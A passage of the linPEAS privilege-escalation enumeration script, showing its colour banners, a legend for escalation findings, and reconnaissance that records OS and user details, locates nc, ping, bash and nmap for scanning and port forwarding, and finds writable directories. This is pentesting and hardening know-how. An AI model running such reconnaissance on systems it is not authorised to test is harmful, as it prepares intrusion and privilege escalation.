    307          \e[48;2;37;68;29m\e[38;2;38;61;33m▄\e[48;2;58;132;39m\e[38;2;62;134;45m▄\e[48;2;64;179;36m\e[38;2;55;129;37m▄\e[48;2;72;217;36m\e[38;2;71;210;36m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;27;82;14m\e[38;2;59;178;30m▄\e[48;2;4;11;3m\e[38;2;3;9;1m▄\e[48;2;0;0;0m\e[38;2;8;18;4m▄\e[48;2;1;3;1m\e[38;2;4;12;2m▄\e[48;2;36;112;19m\e[38;2;54;163;27m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;70;210;36m\e[38;2;72;217;36m▄\e[48;2;4;11;1m\e[38;2;9;28;4m▄\e[48;2;0;0;0m\e[38;2;6;16;3m▄\e[48;2;1;3;1m\e[38;2;6;15;3m▄\e[48;2;13;39;6m\e[38;2;32;94;15m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;70;207;36m\e[38;2;67;196;36m▄\e[48;2;52;110;38m \e[48;2;57;101;47m\e[38;2;56;90;47m▄\e[48;2;36;55;31m\e[38;2;38;58;33m▄\e[0m
    308          \e[48;2;40;63;35m\e[38;2;43;67;38m▄\e[48;2;61;117;48m\e[38;2;45;80;38m▄\e[48;2;54;114;39m\e[38;2;52;110;38m▄\e[48;2;64;177;36m\e[38;2;59;150;37m▄\e[48;2;72;217;36m\e[38;2;72;214;36m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;72;217;36m\e[38;2;73;218;37m▄\e[48;2;61;182;30m\e[38;2;73;218;37m▄\e[48;2;45;135;22m\e[38;2;73;218;37m▄\e[48;2;58;174;29m\e[38;2;73;218;37m▄\e[48;2;72;217;36m\e[38;2;73;218;37m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;71;212;35m\e[38;2;72;216;36m▄\e[48;2;34;101;17m\e[38;2;11;32;5m▄\e[48;2;34;101;17m\e[38;2;1;2;1m▄\e[48;2;34;98;18m\e[38;2;1;3;1m▄\e[48;2;35;101;18m\e[38;2;1;1;1m▄\e[48;2;35;100;17m\e[38;2;1;3;1m▄\e[48;2;57;170;29m\e[38;2;56;168;28m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;72;217;36m\e[38;2;72;218;36m▄\e[48;2;66;197;33m\e[38;2;72;217;36m▄\e[48;2;46;139;23m\e[38;2;73;217;37m▄\e[48;2;54;163;27m\e[38;2;72;217;37m▄\e[48;2;71;212;36m\e[38;2;72;217;36m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;72;217;37m\e[38;2;70;204;36m▄\e[48;2;60;158;37m\e[38;2;53;122;37m▄\e[48;2;52;103;38m\e[38;2;52;104;40m▄\e[48;2;33;54;28m\e[38;2;21;34;18m▄\e[48;2;46;70;41m\e[38;2;49;76;44m▄\e[0m
    309          \e[48;2;49;76;44m\e[38;2;51;78;45m▄\e[48;2;32;51;28m\e[38;2;43;65;37m▄\e[48;2;61;125;45m\e[38;2;81;124;71m▄\e[48;2;54;124;38m\e[38;2;53;113;40m▄\e[48;2;68;202;36m\e[38;2;60;156;37m▄\e[48;2;73;218;37m\e[38;2;72;215;36m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m\e[38;2;73;216;37m▄\e[48;2;73;217;37m\e[38;2;93;205;61m▄\e[48;2;79;213;44m\e[38;2;121;189;95m▄\e[48;2;85;210;51m\e[38;2;132;184;108m▄\e[48;2;82;211;47m\e[38;2;121;191;93m▄\e[48;2;73;217;37m\e[38;2;85;210;52m▄\e[48;2;73;218;37m\e[38;2;73;217;37m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;37;111;20m\e[38;2;71;214;36m▄\e[48;2;1;2;0m\e[38;2;44;128;22m▄\e[48;2;2;4;2m\e[38;2;15;39;8m▄\e[48;2;1;1;1m\e[38;2;29;82;14m▄\e[48;2;13;37;7m\e[38;2;68;204;34m▄\e[48;2;70;210;35m\e[38;2;73;218;37m▄\e[48;2;73;217;37m\e[38;2;73;218;37m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;217;37m\e[38;2;74;216;38m▄\e[48;2;82;211;47m\e[38;2;118;191;90m▄\e[48;2;100;200;70m\e[38;2;132;185;108m▄\e[48;2;103;201;72m\e[38;2;127;187;101m▄\e[48;2;98;203;67m\e[38;2;125;189;100m▄\e[48;2;85;209;52m\e[38;2;116;192;88m▄\e[48;2;73;217;37m\e[38;2;80;211;44m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;72;217;36m\e[38;2;68;200;35m▄\e[48;2;63;170;35m\e[38;2;54;125;36m▄\e[48;2;51;103;38m\e[38;2;51;99;38m▄\e[48;2;49;101;36m\e[38;2;22;45;17m▄\e[48;2;30;47;26m\e[38;2;45;69;39m▄\e[48;2;51;78;45m \e[0m
    310          \e[48;2;51;78;45m \e[48;2;49;75;43m\e[38;2;51;78;45m▄\e[48;2;30;38;27m\e[38;2;39;59;35m▄\e[48;2;63;123;49m\e[38;2;71;110;62m▄\e[48;2;54;121;37m\e[38;2;56;119;40m▄\e[48;2;68;198;37m\e[38;2;60;158;37m▄\e[48;2;73;218;37m\e[38;2;71;216;36m▄\e[48;2;73;217;37m\e[38;2;73;216;38m▄\e[48;2;91;206;58m\e[38;2;110;196;81m▄\e[48;2;122;191;95m\e[38;2;126;188;100m▄\e[48;2;128;186;102m\e[38;2;130;187;104m▄\e[48;2;140;180;116m\e[38;2;128;187;103m▄\e[48;2;126;188;100m\e[38;2;106;197;76m▄\e[48;2;96;202;64m\e[38;2;75;215;39m▄\e[48;2;73;217;37m\e[38;2;72;218;36m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;74;220;37m\e[38;2;73;218;37m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;74;217;38m\e[38;2;73;217;37m▄\e[48;2;114;194;86m\e[38;2;76;215;40m▄\e[48;2;142;178;121m\e[38;2;94;205;62m▄\e[48;2;150;176;129m\e[38;2;109;196;81m▄\e[48;2;142;180;120m\e[38;2;95;203;63m▄\e[48;2;116;193;88m\e[38;2;76;214;41m▄\e[48;2;78;213;44m\e[38;2;73;217;37m▄\e[48;2;73;218;37m\e[38;2;73;217;37m▄\e[48;2;73;218;37m\e[38;2;67;196;36m▄\e[48;2;71;209;37m\e[38;2;60;154;36m▄\e[48;2;59;152;36m\e[38;2;57;138;37m▄\e[48;2;52;110;38m\e[38;2;56;130;37m▄\e[48;2;51;104;38m\e[38;2;30;71;21m▄\e[48;2;20;31;17m\e[38;2;45;69;39m▄\e[48;2;50;78;44m\e[38;2;51;78;45m▄\e[48;2;51;78;45m \e[0m
    311          \e[48;2;51;78;45m\e[38;2;28;43;24m▄\e[48;2;51;78;45m\e[38;2;43;64;38m▄\e[48;2;51;78;45m\e[38;2;52;79;46m▄\e[48;2;34;53;30m\e[38;2;46;71;41m▄\e[48;2;64;124;48m\e[38;2;49;106;36m▄\e[48;2;53;115;38m\e[38;2;57;124;40m▄\e[48;2;63;175;36m\e[38;2;55;126;38m▄\e[48;2;73;217;37m\e[38;2;66;186;36m▄\e[48;2;89;208;56m\e[38;2;73;217;37m▄\e[48;2;111;195;82m\e[38;2;75;215;40m▄\e[48;2;109;197;80m\e[38;2;74;216;38m▄\e[48;2;85;209;52m\e[38;2;73;218;36m▄\e[48;2;73;216;37m\e[38;2;73;218;37m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;217;37m\e[38;2;73;218;37m▄\e[48;2;73;217;37m\e[38;2;73;218;37m▄\e[48;2;73;217;36m\e[38;2;73;218;37m▄\e[48;2;73;218;37m\e[38;2;71;214;36m▄\e[48;2;71;212;36m\e[38;2;63;172;36m▄\e[48;2;63;174;35m\e[38;2;57;138;37m▄\e[48;2;58;146;36m\e[38;2;57;137;38m▄\e[48;2;58;139;37m\e[38;2;57;138;37m▄\e[48;2;58;138;37m\e[38;2;54;128;35m▄\e[48;2;50;117;34m\e[38;2;20;44;14m▄\e[48;2;20;32;17m\e[38;2;39;61;34m▄\e[48;2;51;77;44m\e[38;2;45;69;40m▄\e[48;2;51;78;45m\e[38;2;45;69;40m▄\e[48;2;51;78;45m\e[38;2;49;75;43m▄\e[0m
    312          \e[48;2;84;151;67m\e[38;2;98;177;78m▄\e[48;2;43;80;34m\e[38;2;98;177;78m▄\e[48;2;22;39;19m\e[38;2;98;178;78m▄\e[48;2;43;67;38m\e[38;2;81;148;64m▄\e[48;2;40;70;33m\e[38;2;44;78;36m▄\e[48;2;54;127;36m\e[38;2;21;47;15m▄\e[48;2;55;120;39m\e[38;2;54;117;39m▄\e[48;2;56;133;37m\e[38;2;59;133;40m▄\e[48;2;71;211;36m\e[38;2;61;164;37m▄\e[48;2;73;217;36m\e[38;2;71;211;36m▄\e[48;2;73;218;37m\e[38;2;72;218;36m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m\e[38;2;73;217;37m▄\e[48;2;73;218;37m\e[38;2;72;217;36m▄\e[48;2;73;218;37m\e[38;2;67;203;34m▄\e[48;2;68;194;37m\e[38;2;40;116;21m▄\e[48;2;58;142;36m\e[38;2;8;21;5m▄\e[48;2;49;120;31m\e[38;2;6;10;5m▄\e[48;2;25;59;16m\e[38;2;73;108;65m▄\e[48;2;15;33;11m\e[38;2;95;157;79m▄\e[48;2;12;25;9m\e[38;2;97;175;77m▄\e[48;2;21;32;19m\e[38;2;99;179;79m▄\e[48;2;23;35;19m\e[38;2;98;178;78m▄\e[48;2;20;34;17m\e[38;2;98;178;78m▄\e[48;2;13;24;11m\e[38;2;98;178;78m▄\e[48;2;16;26;14m\e[38;2;98;177;78m▄\e[0m
    313          \e[48;2;97;176;77m\e[38;2;58;103;46m▄\e[48;2;98;177;78m\e[38;2;94;170;75m▄\e[48;2;98;177;78m\e[38;2;99;179;79m▄\e[48;2;98;177;78m\e[38;2;97;176;77m▄\e[48;2;97;176;77m\e[38;2;98;177;78m▄\e[48;2;91;165;72m\e[38;2;98;177;78m▄\e[48;2;55;100;44m\e[38;2;98;177;78m▄\e[48;2;15;27;10m\e[38;2;92;168;73m▄\e[48;2;24;46;18m\e[38;2;76;138;61m▄\e[48;2;73;154;53m\e[38;2;54;96;43m▄\e[48;2;74;213;39m\e[38;2;24;48;18m▄\e[48;2;74;222;37m\e[38;2;20;55;11m▄\e[48;2;73;217;37m\e[38;2;31;91;16m▄\e[48;2;73;218;37m\e[38;2;49;145;24m▄\e[48;2;73;218;37m\e[38;2;68;201;35m▄\e[48;2;73;218;37m\e[38;2;73;217;37m▄\e[48;2;73;218;37m\e[38;2;74;220;37m▄\e[48;2;73;218;37m\e[38;2;73;219;37m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m\e[38;2;73;220;37m▄\e[48;2;73;218;37m\e[38;2;72;214;37m▄\e[48;2;73;218;37m\e[38;2;63;187;32m▄\e[48;2;72;217;36m\e[38;2;41;120;22m▄\e[48;2;74;222;36m\e[38;2;21;52;13m▄\e[48;2;67;203;34m\e[38;2;39;62;34m▄\e[48;2;40;117;21m\e[38;2;64;103;54m▄\e[48;2;14;43;7m\e[38;2;72;126;57m▄\e[48;2;4;12;2m\e[38;2;87;156;69m▄\e[48;2;25;45;21m\e[38;2;97;174;78m▄\e[48;2;71;124;57m\e[38;2;99;177;80m▄\e[48;2;97;168;78m\e[38;2;94;170;75m▄\e[48;2;96;175;77m\e[38;2;103;177;84m▄\e[48;2;98;176;79m\e[38;2;109;183;90m▄\e[48;2;100;178;80m\e[38;2;112;185;94m▄\e[48;2;100;177;80m\e[38;2;111;184;92m▄\e[48;2;99;177;80m\e[38;2;107;182;89m▄\e[48;2;98;177;78m\e[38;2;105;182;85m▄\e[48;2;98;177;78m\e[38;2;103;180;83m▄\e[48;2;98;177;78m\e[38;2;99;177;79m▄\e[0m
    314           \e[38;2;54;79;47m▀\e[38;2;72;123;60m▀\e[48;2;97;176;78m\e[38;2;65;87;60m▄\e[48;2;98;177;78m\e[38;2;73;130;59m▄\e[48;2;98;177;78m\e[38;2;91;165;72m▄\e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;96;172;77m\e[38;2;98;177;78m▄\e[48;2;82;147;65m\e[38;2;98;177;78m▄\e[48;2;66;116;52m\e[38;2;98;177;78m▄\e[48;2;46;78;38m\e[38;2;98;177;78m▄\e[48;2;27;51;20m\e[38;2;98;177;78m▄\e[48;2;28;60;20m\e[38;2;94;169;74m▄\e[48;2;28;67;19m\e[38;2;86;155;69m▄\e[48;2;34;96;19m\e[38;2;69;123;54m▄\e[48;2;42;126;21m\e[38;2;48;86;39m▄\e[48;2;51;148;27m\e[38;2;36;64;28m▄\e[48;2;55;164;28m\e[38;2;26;46;20m▄\e[48;2;60;180;30m\e[38;2;23;39;18m▄\e[48;2;62;186;31m\e[38;2;21;40;17m▄\e[48;2;61;181;31m\e[38;2;19;36;16m▄\e[48;2;67;176;40m\e[38;2;18;32;14m▄\e[48;2;63;173;35m\e[38;2;23;36;19m▄\e[48;2;56;168;29m\e[38;2;27;42;23m▄\e[48;2;53;160;27m\e[38;2;29;45;24m▄\e[48;2;44;133;22m\e[38;2;30;53;25m▄\e[48;2;34;102;17m\e[38;2;52;89;43m▄\e[48;2;20;60;10m\e[38;2;88;148;71m▄\e[48;2;24;47;19m\e[38;2;97;171;78m▄\e[48;2;34;62;27m\e[38;2;98;177;78m▄\e[48;2;55;99;44m\e[38;2;98;177;78m▄\e[48;2;80;144;64m\e[38;2;98;177;78m▄\e[48;2;99;176;79m\e[38;2;98;177;78m▄\e[48;2;98;177;78m \e[48;2;98;177;78m\e[38;2;99;177;79m▄\e[48;2;99;177;79m\e[38;2;96;172;76m▄\e[48;2;99;175;79m\e[38;2;85;151;68m▄\e[48;2;95;169;76m\e[38;2;72;121;60m▄\e[48;2;109;180;92m\e[38;2;37;57;32m▄\e[48;2;100;159;85m\e[38;2;38;41;36m▄\e[48;2;72;107;62m\e[38;2;74;74;74m▄\e[0m\e[38;2;44;65;38m▀\e[38;2;31;48;27m▀\e[38;2;31;48;26m▀\e[38;2;31;52;25m▀\e[38;2;41;71;34m▀\e[38;2;59;97;50m▀\e[0m
    315                \e[38;2;95;106;94m▀\e[38;2;81;137;65m▀\e[38;2;91;166;73m▀\e[48;2;95;174;76m\e[38;2;61;73;59m▄\e[48;2;98;177;78m\e[38;2;33;66;26m▄\e[48;2;98;177;78m\e[38;2;81;143;65m▄\e[48;2;98;177;78m\e[38;2;102;182;81m▄\e[48;2;98;177;78m\e[38;2;97;176;77m▄\e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;178;78m\e[38;2;98;177;78m▄\e[48;2;98;179;78m\e[38;2;98;177;78m▄\e[48;2;98;179;78m\e[38;2;98;177;78m▄\e[48;2;99;179;78m\e[38;2;98;177;78m▄\e[48;2;98;179;78m\e[38;2;98;177;78m▄\e[48;2;98;178;78m\e[38;2;98;177;78m▄\e[48;2;98;178;78m\e[38;2;98;177;78m▄\e[48;2;98;178;78m\e[38;2;98;177;78m▄\e[48;2;98;179;78m\e[38;2;98;177;78m▄\e[48;2;97;177;77m\e[38;2;98;177;78m▄\e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m\e[38;2;98;176;78m▄\e[48;2;98;177;78m\e[38;2;99;179;78m▄\e[48;2;98;177;78m\e[38;2;93;169;74m▄\e[48;2;98;177;78m\e[38;2;56;106;44m▄\e[48;2;96;174;77m\e[38;2;16;31;13m▄\e[48;2;68;126;54m\e[38;2;58;58;58m▄\e[0m\e[38;2;28;50;23m▀\e[38;2;20;22;20m▀\e[0m
    316                      \e[38;2;41;52;39m▀\e[38;2;39;76;30m▀\e[38;2;73;136;57m▀\e[48;2;90;162;72m\e[38;2;96;100;95m▄\e[48;2;99;175;79m\e[38;2;60;69;58m▄\e[48;2;98;177;78m\e[38;2;46;59;43m▄\e[48;2;98;177;78m\e[38;2;32;51;27m▄\e[48;2;98;178;78m\e[38;2;28;50;23m▄\e[48;2;98;178;78m\e[38;2;28;55;22m▄\e[48;2;98;178;78m\e[38;2;35;64;28m▄\e[48;2;98;177;78m\e[38;2;41;75;33m▄\e[48;2;98;177;78m\e[38;2;50;89;41m▄\e[48;2;98;177;77m\e[38;2;54;89;45m▄\e[48;2;98;177;77m\e[38;2;53;89;44m▄\e[48;2;98;177;78m\e[38;2;49;86;39m▄\e[48;2;98;177;78m\e[38;2;45;83;36m▄\e[48;2;98;177;78m\e[38;2;40;74;32m▄\e[48;2;98;177;78m\e[38;2;35;64;28m▄\e[48;2;98;178;78m\e[38;2;39;60;33m▄\e[48;2;90;163;71m\e[38;2;55;61;53m▄\e[0m\e[38;2;53;97;41m▀\e[38;2;24;44;19m▀\e[38;2;36;41;35m▀\e[0m
    317 '";
    318     else
    319   echo "            \e[48;5;108m     \e[48;5;59m \e[48;5;71m \e[48;5;77m       \e[48;5;22m \e[48;5;108m   \e[48;5;114m \e[48;5;59m \e[49m
    320             \e[48;5;108m  \e[48;5;71m \e[48;5;22m \e[48;5;113m \e[48;5;71m \e[48;5;94m \e[48;5;214m  \e[48;5;58m \e[48;5;214m    \e[48;5;100m \e[48;5;71m  \e[48;5;16m \e[48;5;108m  \e[49m
    321             \e[48;5;65m \e[48;5;16m \e[48;5;22m \e[48;5;214m      \e[48;5;16m \e[48;5;214m        \e[48;5;65m  \e[49m
    322             \e[48;5;65m \e[48;5;214m       \e[48;5;16m \e[48;5;214m \e[48;5;16m \e[48;5;214m       \e[48;5;136m \e[48;5;65m \e[49m
    323             \e[48;5;23m \e[48;5;214m          \e[48;5;178m \e[48;5;214m       \e[48;5;65m \e[49m
    324             \e[48;5;16m \e[48;5;214m         \e[48;5;136m \e[48;5;94m   \e[48;5;136m \e[48;5;214m    \e[48;5;65m \e[49m
    325             \e[48;5;58m \e[48;5;214m  \e[48;5;172m \e[48;5;64m \e[48;5;77m             \e[48;5;71m \e[48;5;65m \e[49m
    326             \e[48;5;16m \e[48;5;71m \e[48;5;77m  \e[48;5;71m \e[48;5;77m         \e[48;5;71m \e[48;5;77m   \e[48;5;65m  \e[49m
    327             \e[48;5;59m \e[48;5;71m \e[48;5;77m \e[48;5;77m \e[48;5;16m \e[48;5;77m         \e[48;5;16m \e[48;5;77m   \e[48;5;65m  \e[49m
    328             \e[48;5;65m  \e[48;5;77m      \e[48;5;71m \e[48;5;16m \e[48;5;77m    \e[48;5;113m \e[48;5;77m   \e[48;5;65m  \e[49m
    329             \e[48;5;65m \e[48;5;16m \e[48;5;77m  \e[48;5;150m \e[48;5;113m \e[48;5;77m        \e[48;5;150m \e[48;5;113m \e[48;5;77m \e[48;5;65m \e[48;5;59m \e[48;5;65m \e[49m
    330             \e[48;5;16m \e[48;5;65m \e[48;5;71m \e[48;5;77m             \e[48;5;71m \e[48;5;22m \e[48;5;65m  \e[49m
    331             \e[48;5;108m  \e[48;5;107m \e[48;5;59m \e[48;5;77m           \e[48;5;16m \e[48;5;114m \e[48;5;108m   \e[49m"
    332     fi
    333   fi
    334 }
    335 print_support () {
    336   printf """
    337     ${GREEN}/---------------------------------------------------------------------------------\\
    338     |                             ${BLUE}Do you like PEASS?${GREEN}                                  |
    339     |---------------------------------------------------------------------------------|
    340     |         ${YELLOW}Linux PE & Hardening${GREEN}    :     ${RED}https://hacktricks-training.com/courses/lhe/${GREEN} |
    341     |         ${YELLOW}Learn Cloud Hacking${GREEN}       :     ${RED}https://training.hacktricks.xyz ${GREEN}        |
    342     |         ${YELLOW}Follow on Twitter${GREEN}         :     ${RED}@hacktricks_live${GREEN}                        |
    343     |         ${YELLOW}Respect on HTB${GREEN}            :     ${RED}SirBroccoli            ${GREEN}                 |
    344     |---------------------------------------------------------------------------------|
    345     |                                 ${BLUE}Thank you! ${GREEN}                                     |
    346     \---------------------------------------------------------------------------------/
    347 """
    348 }
    349 ###########################################
    350 #-----------) Starting Output (-----------#
    351 ###########################################
    352 echo ""
    353 if [ ! "$QUIET" ]; then print_banner; print_support; fi
    354 printf ${BLUE}"          $SCRIPTNAME-$VERSION ${YELLOW}by carlospolop\n"$NC;
    355 echo ""
    356 printf ${YELLOW}"ADVISORY: ${BLUE}$ADVISORY\n$NC"
    357 echo ""
    358 printf ${BLUE}"Linux Privesc Checklist: ${YELLOW}https://book.hacktricks.wiki/en/linux-hardening/linux-privilege-escalation-checklist.html\n"$NC
    359 printf ${BLUE}"Best Linux PE & Hardening course: ${YELLOW}https://hacktricks-training.com/courses/lhe/\n"$NC
    360 echo " LEGEND:" | sed "s,LEGEND,${C}[1;4m&${C}[0m,"
    361 echo "  RED/YELLOW: 95% a PE vector" | sed "s,RED/YELLOW,${SED_RED_YELLOW},"
    362 echo "  RED: You should take a look into it" | sed "s,RED,${SED_RED},"
    363 echo "  LightCyan: Users with console" | sed "s,LightCyan,${SED_LIGHT_CYAN},"
    364 echo "  Blue: Users without console & mounted devs" | sed "s,Blue,${SED_BLUE},"
    365 echo "  Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs) " | sed "s,Green,${SED_GREEN},"
    366 echo "  LightMagenta: Your username" | sed "s,LightMagenta,${SED_LIGHT_MAGENTA},"
    367 if [ "$IAMROOT" ]; then
    368   echo ""
    369   echo "  YOU ARE ALREADY ROOT!!! (it could take longer to complete execution)" | sed "s,YOU ARE ALREADY ROOT!!!,${SED_RED_YELLOW},"
    370   sleep 3
    371 fi
    372 echo ""
    373 printf " ${DG}Starting $SCRIPTNAME. Caching Writable Folders...$NC"
    374 echo ""
    375 ###########################################
    376 #-----------) Some Basic Info (-----------#
    377 ###########################################
    378 print_title "Basic information"
    379 printf $LG"OS: "$NC
    380 (cat /proc/version || uname -a ) 2>/dev/null
    381 printf $LG"User & Groups: "$NC
    382 (id || (whoami && groups)) 2>/dev/null
    383 printf $LG"Hostname: "$NC
    384 hostname 2>/dev/null
    385 echo ""
    386 if ! [ "$FAST" ] && ! [ "$AUTO_NETWORK_SCAN" ]; then
    387   printf $LG"Remember that you can use the '-t' option to call the Internet connectivity checks and automatic network recon!\n"$NC;
    388 fi
    389 FPING=$(command -v fping 2>/dev/null || echo -n '')
    390 PING=$(command -v ping 2>/dev/null || echo -n '')
    391 DISCOVER_BAN_BAD="No network discovery capabilities (fping or ping not found)"
    392 if [ "$FPING" ]; then
    393   DISCOVER_BAN_GOOD="$GREEN$FPING${BLUE} is available for network discovery$LG ($SCRIPTNAME can discover hosts, learn more with -h)"
    394 else
    395   if [ "$PING" ]; then
    396     DISCOVER_BAN_GOOD="$GREEN$PING${BLUE} is available for network discovery$LG ($SCRIPTNAME can discover hosts, learn more with -h)"
    397   fi
    398 fi
    399 if [ "$DISCOVER_BAN_GOOD" ]; then
    400   printf $YELLOW"[+] $DISCOVER_BAN_GOOD\n$NC"
    401 else
    402   printf $RED"[-] $DISCOVER_BAN_BAD\n$NC"
    403 fi
    404 if [ "$(command -v bash || echo -n '')" ] && ! [ -L "$(command -v bash || echo -n '')" ]; then
    405   FOUND_BASH=$(command -v bash || echo -n '');
    406 elif [ -f "/bin/bash" ] && ! [ -L "/bin/bash" ]; then
    407   FOUND_BASH="/bin/bash";
    408 fi
    409 FOUND_NC=$(command -v nc 2>/dev/null || echo -n '')
    410 if [ -z "$FOUND_NC" ]; then
    411 	FOUND_NC=$(command -v netcat 2>/dev/null || echo -n '');
    412 fi
    413 if [ -z "$FOUND_NC" ]; then
    414 	FOUND_NC=$(command -v ncat 2>/dev/null || echo -n '');
    415 fi
    416 if [ -z "$FOUND_NC" ]; then
    417 	FOUND_NC=$(command -v nc.traditional 2>/dev/null || echo -n '');
    418 fi
    419 if [ -z "$FOUND_NC" ]; then
    420 	FOUND_NC=$(command -v nc.openbsd 2>/dev/null || echo -n '');
    421 fi
    422 SCAN_BAN_BAD="No port scan capabilities (nc and bash not found)"
    423 if [ "$FOUND_BASH" ]; then
    424   SCAN_BAN_GOOD="$YELLOW[+] $GREEN$FOUND_BASH${BLUE} is available for network discovery, port scanning and port forwarding$LG ($SCRIPTNAME can discover hosts, scan ports, and forward ports. Learn more with -h)\n"
    425 fi
    426 if [ "$FOUND_NC" ]; then
    427   SCAN_BAN_GOOD="$SCAN_BAN_GOOD$YELLOW[+] $GREEN$FOUND_NC${BLUE} is available for network discovery & port scanning$LG ($SCRIPTNAME can discover hosts and scan ports, learn more with -h)\n"
    428 fi
    429 if [ "$SCAN_BAN_GOOD" ]; then
    430   printf "$SCAN_BAN_GOOD$NC"
    431 else
    432   printf $RED"[-] $SCAN_BAN_BAD$NC"
    433 fi
    434 if [ "$(command -v nmap 2>/dev/null || echo -n '')" ];then
    435   NMAP_GOOD=$GREEN"nmap${BLUE} is available for network discovery & port scanning, you should use it yourself"
    436   printf $YELLOW"[+] $NMAP_GOOD\n$NC"
    437 fi
    438 echo ""
    439 echo ""
    440 if [ "$PORTS" ] || [ "$DISCOVERY" ] || [ "$IP" ] || [ "$AUTO_NETWORK_SCAN" ]; then MAXPATH_FIND_W="1"; fi #If Network reduce the time on this
    441 if ! [ "$USER" ]; then
    442   USER=$(whoami 2>/dev/null || echo -n "UserUnknown")
    443 fi
    444 for grp in $(groups $USER 2>/dev/null | cut -d ":" -f2); do
    445   wgroups="$wgroups -group $grp -or "
    446 done
    447 wgroups="$(echo $wgroups | sed -e 's/ -or$//')"
    448 if [ ! "$HOME" ]; then
    449   if [ -d "/Users/$USER" ]; then HOME="/Users/$USER"; #Mac home
    450   else HOME="/home/$USER";
    451   fi
    452 fi
    453 SEDOVERFLOW=true
    454 while $SEDOVERFLOW; do
    455   #WF=`find /dev /srv /proc /home /media /sys /lost+found /run /etc /root /var /tmp /mnt /boot /opt -type d -maxdepth $MAXPATH_FIND_W -writable -or -user $USER 2>/dev/null | sort`
    456   #if [ "$MACPEAS" ]; then
    457     WF=$(find / -maxdepth $MAXPATH_FIND_W -type d ! -path "/proc/*" '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or  '(' -perm -g=w -and '(' $wgroups ')' ')' ')'  2>/dev/null | sort) #OpenBSD find command doesn't have "-writable" option
    458   #else
    459   #  WF=`find / -maxdepth $MAXPATH_FIND_W -type d ! -path "/proc/*" -and '(' -writable -or -user $USER ')' 2>/dev/null | sort`
    460   #fi
    461   Wfolders=$(printf "%s" "$WF" | tr '\n' '|')"|[a-zA-Z]+[a-zA-Z0-9]* +\*"
    462   Wfolder="$(printf "%s" "$WF" | grep "/shm" | head -n1)"  # Try to get /dev/shm
